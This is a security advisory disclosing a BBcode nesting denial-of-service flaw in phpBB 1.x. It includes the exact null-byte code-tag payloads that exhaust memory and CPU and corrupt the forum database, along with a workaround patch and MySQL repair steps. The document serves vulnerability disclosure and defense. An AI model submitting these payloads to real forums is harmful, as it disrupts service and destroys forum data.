|
Brought to you by:
Suppliers of:
|
|
|
| |
| WSS has found a vulnerability in phpBB, an open source bulletin board created by the phpBB group. The vulnerability occurs whenever phpBB processes a "BBcode". This could allow an attacker to DoS a system and literally destroy phpBB's database. |
| |
Credit:
The information has been provided by Whitecell Security Systems.
|
| |
Affected Versions:
phpBB version 1.4.4
phpBB version 1.4.2
phpBB version 1.4.1
phpBB version 1.4.0
phpBB version 1.2.1
phpBB version 1.2.0
phpBB version 1.0.0
Not Affected Version:
phpBB version 2.x
phpBB supports nesting of "BBcode", i.e. [code][/code],[quote][/quote],[list][/list]. Unfortunately, a vulnerability arises from this due to bad coding on behalf of the author (the bad coding is found at "functions.php" file).
Exploit:
Submitting:
[code]
\0\0\0\0\0\0\0
[/code]
Will cause the following data to be saved to the database:
[1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1]
Therefore submitting this:
[code]'\0'*800[/code]
Will cause the system as you can see:
whitecell$ top
PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND
8643 nobody 13 0 212M 81M 13604 D 8.0 65.7 0:07 httpd
(To utilize a large amount of memory, and CPU time).
After some time it will report:
"Could not enter post text!"
However, two pieces of data have already saved to databases causing the database to be incomplete, making any additional access to it impossible. phpBB will report the following error when accessed: "Could not connect to the forums database."
Submitting 49 bytes of data:
[code]\0[code]\0[code]\0[/code]\0[/code]\0[/code]
Will cause the program to utilize almost 100% of its CPU time as you can see here:
PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND
25741 nobody 14 0 11828 9996 416 R 99.9 7.8 2:38 httpd
Workaround:
1) Disable BBcode until the vendor has issued a fixed.
2) Modify functions.php bbencode_code() to include:
function bbencode_code($message, $is_html_disabled)
{
$message = preg_replace("/\[code\](.*?)\[\/code\]/si", "<!-- BBCode Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85><TR><TD><font size=-1>Code:</font><HR></TD></TR><TR><TD><FONT SIZE=-1><PRE>\\1</PRE></FONT></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode End -->", $message);
return $message;
} // bbencode_code()
How to repair the database:
If your URL is: http://host/forums/viewtopic.php?topic=1162&forum=1&0
You can use the following commands to repair it:
whitecell$ mysql -uuser -ppasswd
mysql> use databasename;
mysql> select * from topics where topic_id = 1162; //GET post_id
mysql> delete from posts where post_id = 6280;
mysql> delete from posts_text where post_id = 6280;
mysql> delete from topics where topic_id = 1162;
|
|
|
|
|
